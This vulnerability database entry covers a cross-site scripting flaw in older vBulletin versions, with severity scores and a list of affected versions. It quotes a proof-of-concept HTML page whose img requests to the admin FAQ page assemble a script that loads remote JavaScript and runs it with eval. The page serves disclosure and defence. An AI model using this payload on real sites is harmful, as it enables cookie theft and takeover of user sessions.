Related Weaknesses
CWE-ID |
Weakness Name |
Source |
CWE-79 |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. |
|
Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V2 |
4.3 |
|
AV:N/AC:M/Au:N/C:N/I:P/A:N |
[email protected] |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 32017
Publication date : 2008-07-07 22h00 +00:00
Author : Jessica Hope
EDB Verified : Yes
source: https://www.securityfocus.com/bid/30134/info
vBulletin is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.
Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
Versions prior to vBulletin 3.7.2 PL1 and 3.6.10 PL3 are vulnerable.
<html>
<body>
<img
src="http://http://www.example.com/vB/upload/admincp/faq.php/0?do=<script>/*"
/>
<img
src="http://http://www.example.com/vB/upload/admincp/faq.php/1?do=*/a%3D'document.wri'/*"
/>
<img
src="http://http://www.example.com/vB/upload/admincp/faq.php/2?do=*/b%3D'te(%22<script
'/*" />
<img
src="http://http://www.example.com/vB/upload/admincp/faq.php/3?do=*/c%3D'src=http://'/*"
/>
<!--edit to match your data -->
<img
src="http://http://www.example.com/vB/upload/admincp/faq.php/4?do=*/d%3D'http://www.example.com/'/*"
/>
<img
src="http://http://www.example.com/vB/upload/admincp/faq.php/5?do=*/e%3D''/*"
/>
<img
src="http://http://www.example.com/vB/upload/admincp/faq.php/6?do=*/f%3D't.js></scrip'/*"
/>
<!-- end edit -->
<img
src="http://http://www.example.com/vB/upload/admincp/faq.php/7?do=*/g%3D't>%22)'/*"
/>
<img
src="http://http://www.example.com/vB/upload/admincp/faq.php/8?do=*/h%3Da%2Bb%2Bc%2Bd%2Be%2Bf%2Bg/*"
/>
<img
src="http://http://www.example.com/vB/upload/admincp/faq.php/9?do=*/eval(h)/*"
/>
<img
src="http://http://www.example.com/vB/upload/admincp/faq.php/a0?do=*/</script>"
/>
</body>
</html>
Products Mentioned
Configuraton 0
Vbulletin>>Vbulletin >> Version 3.6
Vbulletin>>Vbulletin >> Version 3.6.1
Vbulletin>>Vbulletin >> Version 3.6.2
Vbulletin>>Vbulletin >> Version 3.6.3
Vbulletin>>Vbulletin >> Version 3.6.4
Vbulletin>>Vbulletin >> Version 3.6.5
Vbulletin>>Vbulletin >> Version 3.6.6
Vbulletin>>Vbulletin >> Version 3.6.7
Vbulletin>>Vbulletin >> Version 3.6.8
Vbulletin>>Vbulletin >> Version 3.6.9
Vbulletin>>Vbulletin >> Version 3.6.10
Vbulletin>>Vbulletin >> Version 3.6.10
Vbulletin>>Vbulletin >> Version 3.7.0
Vbulletin>>Vbulletin >> Version 3.7.1
Vbulletin>>Vbulletin >> Version 3.7.1
Vbulletin>>Vbulletin >> Version 3.7.1
Vbulletin>>Vbulletin >> Version 3.7.2
References